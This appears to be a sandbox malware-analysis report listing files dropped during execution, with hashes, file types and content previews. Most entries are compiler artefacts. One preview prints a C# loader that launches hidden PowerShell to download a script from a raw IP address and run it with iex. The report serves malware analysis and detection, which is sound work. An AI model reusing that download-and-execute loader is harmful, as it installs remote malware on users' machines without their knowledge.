                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):410
                                                          Entropy (8bit):5.361827289088002
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCq1KDLI4M9tDLI4MWuPTAv:MLUE4Kx1qE4qpE4KO
                                                          MD5:44B4D94ACD354843DF96E9CCF8E41D29
                                                          SHA1:BC5FDBADA2053E785B6C87244E4C545F70C282CE
                                                          SHA-256:E8F78742901691AC4C6473A754BEA72FEF8E723030E46F8B912C14AC1B222C99
                                                          SHA-512:5E7A345EFFC080091CCA25B6668ECECF998B6D8E0CEDE86B58B6066A869F09AB62FDB89F704FADC97BC1EB0EE4509D94250AD0FA3350FC9F0CEBA3AB69D1D805
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):410
                                                          Entropy (8bit):5.361827289088002
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCq1KDLI4M9tDLI4MWuPTAv:MLUE4Kx1qE4qpE4KO
                                                          MD5:44B4D94ACD354843DF96E9CCF8E41D29
                                                          SHA1:BC5FDBADA2053E785B6C87244E4C545F70C282CE
                                                          SHA-256:E8F78742901691AC4C6473A754BEA72FEF8E723030E46F8B912C14AC1B222C99
                                                          SHA-512:5E7A345EFFC080091CCA25B6668ECECF998B6D8E0CEDE86B58B6066A869F09AB62FDB89F704FADC97BC1EB0EE4509D94250AD0FA3350FC9F0CEBA3AB69D1D805
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1510207563435464
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                          MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                          SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                          SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                          SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                          Malicious:false
                                                          Preview:@...e.................................^..............@..........
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:25 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):3.987742097231897
                                                          Encrypted:false
                                                          SSDEEP:24:HDFzW9nqGqtHDwKTF9mfwI+ycuZhN9akSrPNnqS2d:oqGe0KTfmo1ul9a3BqSG
                                                          MD5:8B55EC3E89B66EEEF9DCCEB2584517DD
                                                          SHA1:07F01170CCF94AE9485B33B9BCDBDB5EFC6F18D0
                                                          SHA-256:7B09C959076AE0323BB04A304E98AA2DEE16628D5FFB5112D03396D301D69C5E
                                                          SHA-512:5B6BA0B059C1710AB716EC302EA4FE79EE69BFBC68030F5C80B5BBB3BFE862710177C29741CB3BCD23900C2FE72E7000F9FACCF2EAB4C68DD1D9CCA93328ABDC
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP................F..&..;!.\DOL.............5.......C:\Users\user\AppData\Local\Temp\RES61E6.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.n.j.g.a.w.j.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Tue Dec 24 02:42:26 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1336
                                                          Entropy (8bit):4.012672536540612
                                                          Encrypted:false
                                                          SSDEEP:24:Hwm9ISVIrDHZwKTF9mfwI+ycuZhNtakS7PNnqSSd:uSVIrDiKTfmo1ulta3xqSC
                                                          MD5:A3821600B25DD90710D0B38B5B7F7C42
                                                          SHA1:9CBD84B61D2BB2A3C6556B0A64E5B9CE852AB28C
                                                          SHA-256:61BCDDB3917ED94DA838A3C6148F19B9E4669BAC70A35F05F27B6913FC5F1DF3
                                                          SHA-512:C728A9F778454235CF6E9F2F237A1E0B58F0B58A061673CC537B900A9DCDAF6B3A02D6B6A6725AFEFD3E06947D8A5F927046C5635A832B8EC38CF6C406FF2342
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP..................ZL.?.:.......O.'..........5.......C:\Users\user\AppData\Local\Temp\RES63AB.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.h.y.t.d.s.x.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:28 2024, 1st section name ".debug$S"
                                                          Category:modified
                                                          Size (bytes):1332
                                                          Entropy (8bit):4.019360706417851
                                                          Encrypted:false
                                                          SSDEEP:24:HEFzW91r6iZ3HZFwKTF9mfwI+ycuZhN1akSzPNnqS2d:FXZ35mKTfmo1ul1a35qSG
                                                          MD5:C82F4161023C4C3523F8E4A12724C5DD
                                                          SHA1:F91401046BD9F8AF0355D612BF61BA3C0DF2564E
                                                          SHA-256:FFEC563234A7E9797BB2821E1699F6800D58C9BDC163F612298DD3FD66025531
                                                          SHA-512:6E3792D5CF2A0CFF3F2534AC7B9503C92EAE1043C2B764474713F45B7AF719164D26B5ED93CA198AEF3AA382166AD56ACC1B5CEBD6C645DF8146462F19026A36
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP...............~..!.._.0...'.2..........5.......C:\Users\user\AppData\Local\Temp\RES6C65.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.h.g.z.z.q.q.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:31 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):3.987032391524883
                                                          Encrypted:false
                                                          SSDEEP:24:H9FzW9Aocl2HHwKTF9mfwI+ycuZhNtbakSEUPNnqS2d:ToU2wKTfmo1ultba3E0qSG
                                                          MD5:4C69CA742E22D1D122115FBB4B10C19C
                                                          SHA1:1054F7F57A54D76EA3816A2114B6F10A4D740D5B
                                                          SHA-256:4D5921D33351ABA36C0498AADAFFE12CB05E5C0D33461F517CE7DC08F61CE351
                                                          SHA-512:F8E780B3D258C89A3AF9A498478D99FAD0EBE566B3210643D75C78463CAACE0BDCFED507CDEA3485B0F9EBEEBB3400F43FA66EF56830C9C20E46CDDE9B7FDD9D
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........Q....c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP....................9....{...i..w..........5.......C:\Users\user\AppData\Local\Temp\RES7946.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.e.o.0.1.y.5.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:32 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):4.016875264788155
                                                          Encrypted:false
                                                          SSDEEP:24:H4FzW91rdb6DHnwKTF9mfwI+ycuZhN2akSuPNnqS2d:pdb6DQKTfmo1ul2a3yqSG
                                                          MD5:8849FB831F4FD07BE6AE1DF9BF796983
                                                          SHA1:2760547FEE0C0F55260DE6FFEC154ACD71FB034E
                                                          SHA-256:ECA35E719E9F72FF3F8978339F9EE52B105386541C022DEDAD38ACCA30CBAB57
                                                          SHA-512:ED915CF59380198456A906B851C9FDF7CAFC82DD0BD8817F111AEA76ED1C3ABBB188A69E325CB19EC5849ED4C39F9467462C653AC570A2C14FC250E2D1AE588A
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP.................8vKn.U....3~............5.......C:\Users\user\AppData\Local\Temp\RES7C53.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.j.t.z.e.y.v.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:32 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):4.00954202382923
                                                          Encrypted:false
                                                          SSDEEP:24:H4FzW91rluSH+wKTF9mfwI+ycuZhNiakSaPNnqS2d:pcS9KTfmo1ulia3WqSG
                                                          MD5:FA84B5CDF69D48706AACB8CC61368BF8
                                                          SHA1:AD3514ECA1F1DB1BCD5339000957A68DD934F1F3
                                                          SHA-256:C2B3F71AE0DE3219CB0788B653A76EDDFD189A2892A2FBE996F997DCCE957A6B
                                                          SHA-512:0A0CA01194C61BE0BD85319A5F99ACFD9A89E78F6AAE740CB9CE0ED9B21A91045248357C115472DED4565D1EF6C464FD0B2BCC24CAB0CD4A80B3066410732A21
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP................?.A:...A._..............5.......C:\Users\user\AppData\Local\Temp\RES7CE0.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.k.k.y.4.h.e.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 24 02:42:34 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1332
                                                          Entropy (8bit):3.996655664312536
                                                          Encrypted:false
                                                          SSDEEP:24:HmFzW91r22EHdmWwKTF9mfwI+ycuZhN4GakS5XPNnqS2d:LZE9m1KTfmo1ulHa3rqSG
                                                          MD5:C782A694098812C37E7D1DD0BCEF9190
                                                          SHA1:85C55A2D05F632806D109A663609DC2478FE5D09
                                                          SHA-256:F618461A093B1E4819626C49F79BFD679348BB50CB27D1F9DB4BD5B06C71E3AF
                                                          SHA-512:B56E0ECD9EA9E90570AC632426D569E4100890764C246599CD099787F43E0051400FA03A9447F1CC87262639D2079B05D6FF021BEA40AC2343B8D967E2C0DBD0
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP................56..f..j..~.(2...........5.......C:\Users\user\AppData\Local\Temp\RES83D5.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.e.j.l.a.b.p.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Tue Dec 24 02:42:38 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1336
                                                          Entropy (8bit):3.9821207591180188
                                                          Encrypted:false
                                                          SSDEEP:24:Hsm9INGP/mMHW5QwKTF9mfwI+ycuZhNpGakSIXPNnqSSd:ykmMI/KTfmo1ulUa34qSC
                                                          MD5:1260E28580DE709B67D50A8494865613
                                                          SHA1:F3A3C9E2F22CED4FFD87410E87330F411470193A
                                                          SHA-256:67F21DC629990F9091A907F0D31EF3EE3C6CA8331EF5AA81AEB98413B4B69C1B
                                                          SHA-512:717D711CC90BB7A54891917E9F1A20F7AD28E8BDB588F063A0518E152674B50B36BDFC3E8A4E2BAE857B462D4A0A63DBDAA2D9E523BA07886DED1EAE8F815C15
                                                          Malicious:false
                                                          Preview:L.....jg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP......................N2.hL.wl/.H7..........5.......C:\Users\user\AppData\Local\Temp\RES9337.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.c.v.5.n.2.s.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.090908747402381
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCsbak7YnqqPsUPN5Dlq5J:+RI+ycuZhNtbakSEUPNnqX
                                                          MD5:D11B39ABEB8CC4C07B9DDA106989B977
                                                          SHA1:3086D2AAE89A88698790A8863E76D0A1F94CC91B
                                                          SHA-256:3D0BD6CC776721A40F7049FAAC1A77B477E8AB1F43AC0DAD6DE31A23B6E0AEC6
                                                          SHA-512:97A5AD436AB1BEA9D8A82A816BAEE8D5FD23392635F16641081DD2AA74E3ADE0AA463137CD5F84BA93A2A62EFDD6DCFB549D89690E696895B27EF374365F8311
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.e.o.0.1.y.5.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.e.o.0.1.y.5.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          Process:C:\Windows\System32\loaddll32.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):724
                                                          Entropy (8bit):4.782753816020807
                                                          Encrypted:false
                                                          SSDEEP:12:V/DTLDauCiQnFOd6FTtf8FkxmaTqTy2dn7+o0zNLmiRSLFUQCL:JjbCiKFc6FowJ2xaoiN3RGUNL
                                                          MD5:99382B41100168F76538CFBD7C420DE5
                                                          SHA1:8C4097E9A57C6CD198C39DC42EF913F14263D211
                                                          SHA-256:096719AB4C6A1F5BAE559122034A423DBCEAF015653FD567263704015D2A2099
                                                          SHA-512:225CEE697ACB1972EBCB1C4E131EA254E6C6D60BE0DA0476D99FA4275C92FBEB27556B74540AD15B007E23B09F621805F4C759D9701BAAD386C9A179C58332FD
                                                          Malicious:false
                                                          Preview:.using System;.using System.Diagnostics;..namespace iviewers.{. class BitmapColorPixel. {. public static void StartBitmap(). {. ProcessStartInfo startInfo = new ProcessStartInfo. {. FileName = "powershell",. Arguments = @"-Command ""iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex""",. WindowStyle = ProcessWindowStyle.Hidden. };.. using (Process p = Process.Start(startInfo)). {. p.WaitForExit();. }.. Environment.Exit(0);. }. }.}.
                                                          Process:C:\Windows\System32\loaddll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):5.011723342765393
                                                          Encrypted:false
                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1RCHyg4E2J5xAIfh6GA98FaiQCIFRVRMxTPICHyg4E2J5xAI/:pAu+H2LnCHhJ23fptkHzxszICHhJ23f/
                                                          MD5:11E31F2929D066FB77CD465C714737AA
                                                          SHA1:A4E975F2391898D35E117DC8409CBD72D2CB88E5
                                                          SHA-256:86A10510EA8B20CFD91FC5341E39474071B934268EA5D2F6C76D6975D53FA446
                                                          SHA-512:5FAFA5C7C38065B42ECF9A6CF3700099EC921B68BB074F6299065D6EAA45E7E278740CE41A2D8C633A26166490C14D09D20DE0BBD99719880E693163189495BC
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):2.9559844346579074
                                                          Encrypted:false
                                                          SSDEEP:48:6Z1gJHpAUH0Jjlbo7jhIB/4DMPvffv1ultba3E0q:PAUB790rP34nbKE
                                                          MD5:DC08E7D337D21A2AA13FC3B67E1E7F42
                                                          SHA1:8E6D590671E58537661136C24DA85BA0DF61D3B5
                                                          SHA-256:E06C2AE50CAEC278ABD527E3C896180B2430AC2F2F976A7B82FA7BE757936D17
                                                          SHA-512:C78CD21C04E681D4AB356883FBDDD06E580E7844B5500BABDFD96A15895CD2D7461C4807F5E03948275AD32DEC5CC3C2B741E814073645FC57955CDDD5C6C792
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..E.......s......r...po.....r...po......o.......(......o.......,..o......(....*.........,..4........(....*BSJB............v4.0.30319......l...@...#~......d...#Strings............#US.........#GUID.......`...#Blob...........G.........%3....................................................A.:...z.Z.....Z...............#.....=.:...Q.:.....................(.......P ......H...... ......T.......T.....T...!.T...
                                                          Process:C:\Windows\System32\loaddll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):684
                                                          Entropy (8bit):5.229321091653673
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L5xOHZxO7KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdBO+Kax5DqBVKVrdFAMBJTH
                                                          MD5:1AD5811F134E42D9262542B136238ED6
                                                          SHA1:A10A9C0B49205EF1B22E548C81FF44206B7BD570
                                                          SHA-256:3781C3ECE608D2962914589766C9028BEC4B5E2897F65F67DEA05D47EDC0498C
                                                          SHA-512:47C2643F8DEA1BE0832FB17271A1C93E38348933374491F64D9BA7CE5BD6770072912796B3AFEFC8D88AF87CC42AE697BAB0CB4DA7844A832232020D81D1D123
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.104345845438577
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryoak7YnqquPN5Dlq5J:+RI+ycuZhN2akSuPNnqX
                                                          MD5:89C638764B6EF75585F9CCE5337EDB1F
                                                          SHA1:D9B40747F46B8356CD780A57E12B30EB5588CAE0
                                                          SHA-256:6BB93DC990BA01C2039A0968B891E9F17D9C4949C64F79149A7D0A6360FF0644
                                                          SHA-512:299B03236EAB0469286670857FCDD44E8C3CA2F7F550CB6E00BEB896AB864FE546007B4300C9941BC6225A1864E1A12F832904C4251D1DEADC7558676CC6E0C3
                                                          Malicious:false
